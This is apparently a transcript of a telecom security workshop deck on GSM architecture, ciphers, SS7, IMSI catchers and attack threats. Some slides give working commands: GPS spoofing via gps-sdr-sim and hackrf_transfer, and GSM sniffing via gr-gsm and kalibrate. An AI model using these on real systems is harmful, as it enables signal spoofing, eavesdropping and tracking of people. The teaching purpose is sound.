The document outlines a workshop on telecom security featuring experts Harshit Agrawal and Himanshu Mehta, discussing topics like GSM architecture, encryption algorithms, and security threats. The workshop covers the importance of mobile network security, technical details about telecommunications systems, and various vulnerabilities including IMSI catching and SIM cloning. It emphasizes the continuous evolution of security measures in telecom generations while acknowledging that threats persist as researchers and attackers adapt.

1. Workshop on Telecom Security
Harshit Agrawal
Himanshu Mehta
CISO Platform
Best of The World In SecurityNovember 12-14,2020 | 8AM -4PM (EST) | Global Summit

2. /Speaker/Harshit/> whoami
USER INFORMATION
---------------------------------------------------
Harshit Agrawal
RF and Telecom Security Researcher
---------------------------------------------------
Primary Research area includes
RF Security, Telecom Security,
and IOT Security
Speaker at conferences like RSAC USA,
HITBSecConf Amsterdam, Cyberweek UAE
----------------------------------------------------
Twitter: @harshitnic
Email: harshit[dot]nic[at]gmail[dot]com
LinkedIn: https://linkedin.com/in/harshitnic

3. /Speaker/Himanshu/> whoami
USER INFORMATION
-----------------------------------------------------
Himanshu Mehta
Senior Security Researcher, Xen1thLabs (Digital14 LLC)
-----------------------------------------------------
Primary Research area includes Telecom, RF,
IoT, Network, Web & Mobile Applications Security
------------------------------------------------------
Twitter: @nullvoid0x
Email: himanshu.mehta21@gmail.com
LinkedIn: https://www.linkedin.com/in/himanshumehta21/

4. Topics to be discussed
● Why we need security?
● GSM Architecture
Break (5mins)
● Encryption Algorithm
● User Equipment
Break (5mins)
● Radio Access Network
● Smartphone Tracking
● IMSI catcher
● Security Threats
● Conclusion
Q&A

5. Introduction

6. By Alan Coleman

7. Why we need security in mobile
network?

8. Functions to Target
● All major cellular networks support
– Voice calls
– Voice mail (VM)
– Short Message Service (SMS)
– Location-based Services (LBS)
– IP Connectivity
● Most also support
– Binary configuration messages
– Multimedia messages (MMS)
– Faxing

9. You Only Have One Voice —Don’t Let Hackers Steal It
descript.com

10. 1G Network

11. 2GNetwork
Network Side
User Side
MSC/VLR
BSC/BTS
SIM Card
Terminal Equipment
HLR/AUC

12. GSM Architecture

13. Global System for Mobile Communication (GSM)
● Digital Cellular Network
● GSM offers a number of services
including voice communications, Short
Message Service (SMS), fax, voice mail,
and other supplemental services such
as call forwarding and caller ID.
● Currently there are several bands in
use in GSM. 450 MHz, 850 MHZ, 900
MHz, 1800 MHz, and 1900 MHz are the
most common ones
● Makes use of FDMA and TDMA

14. Mobile Station (MS)
– Mobile Equipment (ME)
● Physical mobile device
● Identifiers
○ IMEI – International Mobile Equipment Identity
– Subscriber Identity Module (SIM)
● Smart Card containing keys, identifiers and algorithms
● Identifiers
○ Ki – Subscriber Authentication Key
○ IMSI – International Mobile Subscriber Identity
○ TMSI – Temporary Mobile Subscriber Identity
○ MSISDN – Mobile Station International Service Digital Network
○ PIN – Personal Identity Number protecting a SIM
○ LAI – location area identity

15. Base Transceiver station (bts)
Base Transceiver Station (BTS): It handles speech encoding, encryption, multiplexing (TDMA), and
modulation/demodulation of the radio signals.
Image source: wikipedia

16. BASE STATION CONTROLLER
Base Station Controller (BSC): The BSC controls multiple BTSs. It handles allocation of radio channels, frequency
administration, power and signal measurements from the MS, and handovers from one BTS to another

17. Image credit: Jörg Eberspächer, Hans-Jörg Vögel

18. GSM Interface
Image credit: Jörg Eberspächer, Hans-Jörg Vögel

19. Mobile Subscriber ISDN (MSISDN)
The MSISDN is the subscriber's phone number. It is the number that another person would dial in order to reach the
subscriber. The MSISDN is composed of three parts:
● Country Code (CC)
● National Destination Code (NDC)
● Subscriber Number (SN)
MSISDN
CC NDC SN

20. International Mobile Equipment Identity IMEI
Uniquely identifies the Mobile Equipment and is burned into phone by the manufacture.
The IMEI is composed of three parts:
● Type Allocation Code (TAC) - 8 digits
● Serial Number (SNR) - 6 digits
● Spare (SP) - 1 digit
IMEI
TAC SNR Spare
8 digits 6 digits 1 digit

21. International Mobile Subscriber Identity (IMSI)
IMSI uniquely identifies the subscriber in network.
Burned into SIM Card when subscriber registers with PLMN service provider.
● Mobile Country Code(MCC)
● Mobile Network Code (MNC)
● Mobile Subscriber Identification Number (MSIN)
IMSI
MCC MNC MSIN
3 digits 2 or 3 digits Max 10 digits
<--------------- Not to Exceed 15 Digits------------->

22. TMSI-Temporary mobile subscriber identity
● Goals
○ TMSI is used instead of IMSI as an a temporary subscriber identifier
○ TMSI prevents an eavesdropper from identifying of subscriber
● Usage
○ TMSI is assigned when IMSI is transmitted to AuC on the first phone switch on
○ Every time a location update (new MSC) occur the networks assigns a new TMSI
○ TMSI is used by the MS to report to the network or during a call initialization
○ Network uses TMSI to communicate with MS
○ On MS switch off TMSI is stored on SIM card to be reused next time
– The Visitor Location Register (VLR) performs assignment, administration and update of the TMSI

23. Case study: GSMA Device check

24. GSM database and addresses summary
Image credit: Jörg Eberspächer, Hans-Jörg Vögel

25. Multiple Access
Image credit: Jörg Eberspächer, Hans-Jörg Vögel

26. Absolute radio frequency channel number (ARFCN)
● Describes a pair of frequencies (one
uplink and one downlink with bandwidth
of 200kHz)
● The following table summarizes the
frequency ranges, offsets, and ARFCNs
for several popular bands.
Image credit: Faruk Hadziomerveric, SSST Fall 2009

27. Calculating Uplink/Downlink Frequencies
GSM 900
Up = 890.0 + (ARFCN * 0.2)
Down = Up + 45.0
EGSM900
Up = 890.0 + (ARFCN * .2)
Down = Up + 45.0
DCS1800
Up = 1710.0 + ((ARFCN - 511) * .2)
Down = Up + 95.0
PCS1900
Up = 1850.0 + ((ARFCN - 512) * .2)
Down = Up + 80.0

28. Time location update
Image credit: Fabian van den Broek

29. Identity Management
LAI1 LAI2
LAI1,
TMSI1
● IMSI is the long-term identity stored on the SIM card
● TMSI is a short-term identity reallocated periodically, According to the standard at least at each
change of location
● New TMSI should not be linkable with old one

30. Identity Management
● IMSI is the long-term identity stored on the SIM card
● TMSI is a short-term identity reallocated periodically, According to the standard at least at each
change of location
● New TMSI should not be linkable with old one
LAI1 LAI2
LAI2,
TMSI2
Location Update

31. Roaming location update
Image credit: Fabian van den Broek

32. Handoff in Mobile connections
Image source: Tutorialspoint

33. Types of Handoff
Image source: Tutorialspoint

34. UMTS Network architecture
Image credit: Björn Gustaf Landfeldt

35. LTE Network architecture
Image credit: Tutorialspoint

36. 2G,3G,4G Simple NetworkArchitecture
Source: 3g4g.co.uk

37. 2G Calling 3G UE
Source: GL communications

38. 2G Calling 4G UE
Source: GL communications

39. Telecom Protocol Stack Layers
Image Credits: Nutaq.com

40. Encryption Algorithms

41. A3 -MS Authentication Algorithm
Goal: Generation of SRES response to MSC’s random challenge RAND
Image credit: Ankit Pandey

42. A8 -Voice privacy key generation Algorithm
Goal: generation of session key (Kc) from the secret key Ki and the challenge (RAND)
A8 Specification was never made public

43. A3 and A8 -logical implementation
COMP128 is used for both A3 and A8 in most GSM networks.
- COMP128 is a keyed hash function

44. A5 -Encryption Algorithm

45. A5/1 Stream Cipher algorithm
Image credit: Ray Felch

46. Image credit: Hayder Hendi

47. Image source: Tech Junkie

48. SS7 Network Overview
Image credit: Tobias Engel

49. SS7 Network Overview
Image credit: Tobias Engel

50. SS7 Network Overview
Image credit: Tobias Engel

51. SS7Attack Impact

52. Signaling Channels
Broadcast Channels(BCH) Common Control Channels (CCH) Standalone Dedicated Control
Channels (SDCCH)
- Transmitted by BTS to the MS
- Carries system parameters
needed to identify the network,
synchronize time and frequency
with the network
- Used for signaling between
BTS and the MS
- To Request and Grant
access to the network
- Used for call setup
- (ACCH) used for signalling
associated with calls and
call-setup.
- Broadcast Control Channel
(BCCH)
- Frequency Correction Channel
(FCCH)
- Synchronisation Channel (SCH)
- Cell Broadcast Channel (CBCH)
- Paging Channel (PCH)
- Random Access Channel
(RACH)
- Access Grant Channel
(AGCH)
- Associated Control Channel
(ACCH)
- Fast Associated Control
Channel (FACCH)
- Slow Associated Control
Channel (SACCH)

53. Location Updating Request (TMSI not established yet)

54. Authentication Request

55. TMSI / A5/1 Algorithm Supported

56. From Speech to Signal
Image credit: Fabian van den Broek

57. UE (Network+SIM CARD)

58. http://www.mobilecellphonerepairing.com/

59. SIM card security
What is a SIM Card?
● A portable memory chip
● Protected by:
○ –A PIN (Personal Identification Number)
○ –A PUK (Personal Unblocking Code)
● Also includes other parameters of the user
such as it's IMSI
● Allows the cell phone to operate on the
network.

60. Uicc & Sim
Source: 3g4g.co.uk

61. SIM JACKER
-AdaptiveMobile Security

62. Radio Access Network

63. What Is RF?

64. Radio during WW1 and WW2
1941 Swedish HF portable...One guy carries
the radio, the other guy carries the battery.
Cavalry horse wearing a field radio.Operating an AAC (Anti-Aircraft) telephone headset to
communicate with observation balloon.
Image source: wikipedia

65. Inside the Radio Wave Spectrum
3 KHz
1 GHz 3 GHz
4 GHz
5 GHz
2 GHz
AM Radio
2.4 GHz band
Used by more than 300 consumer devices, including
microwave ovens, cordless phones and wireless
networks (WiFi and Bluetooth)
Broadcast TV
Garage Door
Openers
Door Openers
Auctioned
Spectrum
Cell Phones
Global
Positioning
System
Wireless
Medical
Telemetry
GSM Network
Satellite
Radio
Weather Radar
Cable TV
Satellite
Transmissions
Highway Toll
Tags
5 GHz
WiFi Network
Security
Alarms
Most of the white
area of this band is
reserved for
military, federal
government and
industry use

66. How is
Radio Spectrum
used and managed?

67. Signals Overview
● Data is transmitted via radio signals in wireless
networks
● Radio signal: electromagnetic wave… …generated
by a transmitter in dependence on the data to be
transferred (modulation*),
○ …emitted by the antenna of the transmitter,
○ …caught by the antenna of the receiver, and
○ …sampled by the receiver to recover the data
bits (de-modulation)
● Carrier frequency/carrier: radio signal of a constant
frequency generated by the receiver for modulation
● Carrier frequency can be described by a sine
wave (defined by three parameters)
● Each parameter can be used for the modulation of
data
○ Amplitude Shift Keying
○ Frequency Shift Keying
○ Phase Shift Keying

68. Time domain and Frequency domain
Image source: wikipedia

69. Characteristics of mobile radio channel

70. Importance of frequency selection

71. Importance of frequency selection

72. Intercepting traffic using software defined radio
Image source: ITU 2020

74. Image source: wikipedia

75. GSMTAP
● Useful to debug the radio
interface.
● GSMTAP encapsulates RF
information and transmits it in a
UDP encapsulated packet.
● This allows us to see the Um
interface traffic from a BTS or MS
of downlink and uplink.
● Extremely useful capability when
analysing GSM.

76. ...but at first some
words about:
dB and dBm

77. Smartphone tracking

78. Smartphone Surveillance and tracking techniques
● Mobile Signal Tracking
○ Cell Tower
○ IMSI Catcher
● Wi-Fi and Bluetooth Tracking
● Infecting Phones with Spyware/Malware
● Forensic Analysis of Seized Phones
● Location Information Leaks from Apps and Websites
● GPS and Network Time Protocol

79. GPS Spoofing
Prepare the Test Environment:
Download the GPS-SIM-SDR Software and Compile it:
Get the current satellite positions from NASA:
Generate the signal file with the static position (coordinates) you want to send:
Send the signal:
#!/bin/sh
day=$(date +%j)
year=$(date +%Y)
yr=$(date +%y)
wget "ftp://cddis.gsfc.nasa.gov/gnss/data/daily/$year""/brdc/brdc""$day""0.$yr""n.Z"
uncompress "brdc""$day""0.$yr""n.Z"
echo "brdc""$day""0.$yr""n.Z"
./gps-sdr-sim -b 8 -e YOUR_BRDC_FILE_HERE -l 40.812800,-60.005900,100
Sudo git clone https://github.com/osqzss/gps-sdr-sim.git
sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0

82. Locating Mobile Phones
Trilateration (by measuring the distance), Triangulation (by measuring angle)
to known reference points
Image source: Cooper Quintin

83. Triangulation
Source:Mark Godsey

84. TDOA/ TOA/ AOA / E-OTD
Image credit: Omar Ahmad Al-Bayari and
http://etutorials.org/

85. IMSI Catching

86. IMSI CATCHER
In 1996, German company Rohde & Schwarz
launched the first IMSI catcher GA090 in Munich.
Initial design of IMSI Catcher is to identify the
cellphone’s geographic location by instructing the
cellphone to transmit IMSI
● IMSI: International Mobile Subscriber Identity
● MCC: Mobile Country Code
● MNC: Mobile Network Code
● MSIN: Mobile Subscriber Identity
● LAC: Location Area Code
● CellId: Unique number to Identity (BTS) within
LAC

87. What kind of data imsi capture?
Image source: Electronic Frontier Foundation

88. GSM sniffing with gr-gsm
Prepare the Test Environment:
Install the compilation dependencies:
Compile “gr-gsm”:
Compile “kalibrate” (choose the version based on your hardware)
Scan for Base Station with kal
git clone https://github.com/ptrkrysik/gr-gsm.git
cd gr-gsm
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig
git clone https://github.com/scateu/kalibrate-hackrf.git (for HackRF version)
git clone https://github.com/steve-m/kalibrate-rtl.git (for RTL version)
cd kalibrate-hackrf
./bootstrap
./configure
make
sudo make install
sudo apt-get install git cmake libboost-all-dev libcppunit-dev swig doxygen liblog4cpp5-dev python-scipy
kal -s GSM900 -g 40 //Scan GSM900 band
grgsm_livemon -f 945.4e6

89. GNU radio
GNU Radio is a framework that enables users to design, simulate, and deploy highly capable real-world
radio systems.

92. IMSI CATCHER
Two Operating Modes are known:
● Identification Mode
● Camping Mode
StingRay II, a cellular site simulator used for surveillance purposes manufactured by
Harris Corporation, of Melbourne, Fla.Photo: U.S. Patent and Trademark Office via AP

93. MITM on 3g networks exploiting ss7vulnerability

94. White-Stingray: Evaluating IMSI Catchers Detection
Applications (Ravishankar Borgaonkar, Altaf Shaik)
App1: Snoopwitch App2: Cell Spy Catcher
App3: GSM Spy Finder App4: Darshak
App5: AIMSICD

95. SecurityThreats

96. GSM networks are victim and source of attacks on user privacy

97. Common types of Attack:
Image source: ENISA 2018

98. Threat: SIM Cloning
Exploit: weaknesses in COMP128/COMP128-1 used by key-gen (A8) and auth (A3) allow retrieval of
the long term key KIMSI
Requirements: physical access to original SIM card card reader/writer blank SIM card cracking
software
Effects: identity theft, available credit/allowance theft, DOS
Mitigations: cloning can be detected as SIM using COMP128-2/3 cannot be cloned

99. Threat: Session key retrieval (cracking tool available)
Exploit: weaknesses in A5/1
Requirements:
● 64bits of known plaintext, e.g. control messages uses brute force-like attack based on rainbow
tables (implemented in the Kraken tool)
● way of locating target user (eg. silent SMS/silent call locating attack)
● device to sniff traffic on dedicated channel (modified motorola phone)
Effects: breach of phone call/SMS message confidentiality Mitigations: use stronger encryption
algorithm

100. Threat: User De-registration DOS attack
Exploit: lack of authentication of signalling messages
Requirements: MS-like device programmed to send IMSI detach messages to the network
Effects: user unreachable for mobile terminated services

101. Threat: Paging response DOS attack
Exploit: lack of authentication of signalling messages
Requirements: MS-like device programmed to send paging response messages to the network
answer paging request faster than the victim phone
Effects: incoming call dropped incoming call hijacked if attack performed in unencrypted network
Mitigations: use of encryption, indication of no encryption on MS

102. Threat: User tracking
Exploit: silent phone call/SMS, TMSI not updated often
Requirements: MS-like device programmed to sniff signalling messages over dedicated channels
Effects: breach of user privacy
Mitigations: frequent change of TMSI

103. Threat: 2G downgrade attack
Exploit: lack of authentication of serving network
Requirements: Fake BS
Effects: Fake BS forces downgrade to 2G
Mitigations: set network connection on 3G only in MS settings

104. Threat: Redirection attack
Exploit: lack of authentication of serving network
Requirements: Fake BS and a MS connected to a real BS
Effects: redirection of the communication to a chosen network perhaps one charging a higher rate
or using weaker encryption

105. Conclusion
Security Mitigations improved with evolving Telecom generations, but no matter what security
researchers and attackers will always find their way.
Telecommunications providers are under fire from two sides: they face direct attacks from
cybercriminals intent on breaching their organization and network operations, and indirect attacks
from those in pursuit of their subscribers.

106. Learning: Navigating 3GPP document
● 22 series: Service aspects
● 23 series: Technical realization
○ TS 23.203: Policy and Charging Control Architecture
○ TS 23.401: GPRS enhancements for E-UTRAN access
○ TS 23.501: Systems Architecture for the 5G System
● 24 series: Signaling protocols –user to network
○ TS 24.301 NAS protocol for EPS (MM, SM procedures)
● 29 series: Signaling protocols-intra-fixed-network
○ TS 29.171-173: Location Services
● 33 series: Security
● 36 series: LTE radio aspects
○ TS 36.300: E-UTRAN –Overall description; Stage 2
○ TS 36.331: Radio Resource Control (RRC); protocol specification
● 38: 5G radio aspects
http://www.3gpp.org/specifications/specification-numbering

107. There’s never enough time...
Harshit Agrawal
harshit.nic@gmail.com
@harshitnic
Himanshu Mehta
himanshu.mehta21@gmail.com
@nullvoid0x